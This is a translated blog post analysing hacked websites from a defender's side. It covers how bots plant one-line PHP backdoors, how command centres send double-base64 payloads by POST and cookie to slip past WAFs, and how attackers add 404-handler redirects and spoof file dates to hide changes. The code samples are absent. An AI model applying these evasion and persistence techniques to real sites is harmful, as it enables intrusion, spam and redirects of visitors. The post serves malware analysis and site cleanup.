📜 ⬆️ ⬇️

Some immersion inside the hacked site

It is no secret that most sites these days are not broken manually. There is a large army of bots that search for vulnerabilities in site scripts, brute-force CMS admin panels, FTP / SSH accounts, then download small bootloader scripts or backdoors, inject several dozens of “agent” managers into the site scripts, and scatter them randomly directories open for writing, web shells, spam mailers and other malicious php (and sometimes perl) scripts. From the inside, the infected site looks like this (report fragment from the AI-BOLIT scanner):



The patterns of infection (the number, composition and purpose of malicious scripts) may vary. In this case, infection statistics are as follows:
')

Among the “malware” there are all sorts of interesting instances. But today it is not about them. It is more interesting to analyze not so much static malicious code in files, as the process of working with “malware” in dynamics: what requests and in what format do command centers send to the embedded backdoors, with what intensity, with what parameters, etc. In addition, static analysis works badly for modern malware because some scripts do not contain payloads.

Take the popular backdoor:



It consists of one or two lines and is used to receive and execute PHP code. Payload "arrives" in the POST request parameters and is executed at the same moment. Naturally, the payload code is not stored anywhere, so the dynamic analysis process usually rests on the lack of data: there are no logs with the body of requests that would contain the code under study.

To analyze the communication of the command center with its “agents”, you need to log HTTP requests to the malicious script, and for this you need to set up timely logging of the body of the POST request to a file, which is never done on shared hosting. On dedicated servers, however, POST requests with data are also not logged. This is due to the saving of server resources and, in general, the lack of need. But that is not all. The second problem associated with the analysis of hacking and infection of the site is the late appeal of the owner of the infected site to specialists.
Almost always, "patients" are treated 2-3 weeks after the appearance of the first malicious script. That is, when the downloaded code has already been implemented, it has “fallen asleep” and begins to be actively exploited by hackers, and the site is blocked by hosting due to spam sending, phishing pages, or attacks on third-party resources. By the way, the code is “tracked down” in order to cover the traces of hacking and not immediately arouse suspicion of the site owner. Weeks after two rotations of logs do their dirty work, erasing information about how the malicious code was uploaded to the site, and the implemented malware start creating harmful payload: attack other resources, upload to the site doorway pages, spam mailers, implement a code for redirects to bundles of splots, send tons of spam emails with phishing content, etc.

But from time to time you still manage to set up logging on the infected site and collect the insights of requests to malicious scripts. So, what is hidden from prying eyes?

It is typical enough for such an infection to introduce a root .htaccess redirect to a pharm affiliate program (selling Viagra, etc.), a wap-click affiliate program (subscribing to media content for SMS) or a malicious resource (for a drive- by attacks or trojan downloads disguised as a flash player or antivirus update).



The redirect in this case is implemented as follows: in the POST request, the php code is transmitted, which is wrapped in base64. The code is executed using a backdoor on a hacked site and adds its own 404 error handler, in which it throws visitors to the attacker's site. Moreover, it is enough to have a missing image, script or .css file on any page of the site in order for the visitor to redirect. Domains to which visitors are redirected, periodically change.

Another example of the log of requests to embedded backdoors and downloaded spam mailing scripts:



Here, too, all data is transmitted in base64 encoding via POST and COOKIE variables. Moreover, the executable fragments are wrapped twice in base64 encoding, in order to bypass WAFs and web scanners who know about base64 and are able to decode it. In the decoded version, the request to the backdoor looks like this:





In payload, you crawl directories and inject code that will look for wordpress files in accessible directories and do one of two things: either to insert malicious content into them, or to restore the original content of files (as the command center implements malware for a while or according to schedule) ). To make it harder to find modified scripts, the modification date (mtime) for files is set by the date that one of the wordpress scripts was modified. In addition, read-only attributes are set so that inexperienced webmasters cannot edit them (this is really puzzling to many).

As for the other “payload” - spamming - the content is wrapped twice in base64 and passed in the POST parameters of the request to the spam mailer. And from time to time they can send some verification letters with service information:



An interesting observation: if you remove all malicious scripts from the site, then after a few unsuccessful requests, the process of communicating with "agents" stops. That is, the command center is not trying to immediately re-hack the site and upload backdoors to it, apparently for the same reason - to hide the process of initial loading backdoors. But if you leave at least one backdoor in the treatment, then through it a whole “bundle” of hacker shells, backdoors and spam mailers will be downloaded again.
Therefore, the site should always be treated very carefully.

Source: https://habr.com/ru/post/280516/


All Articles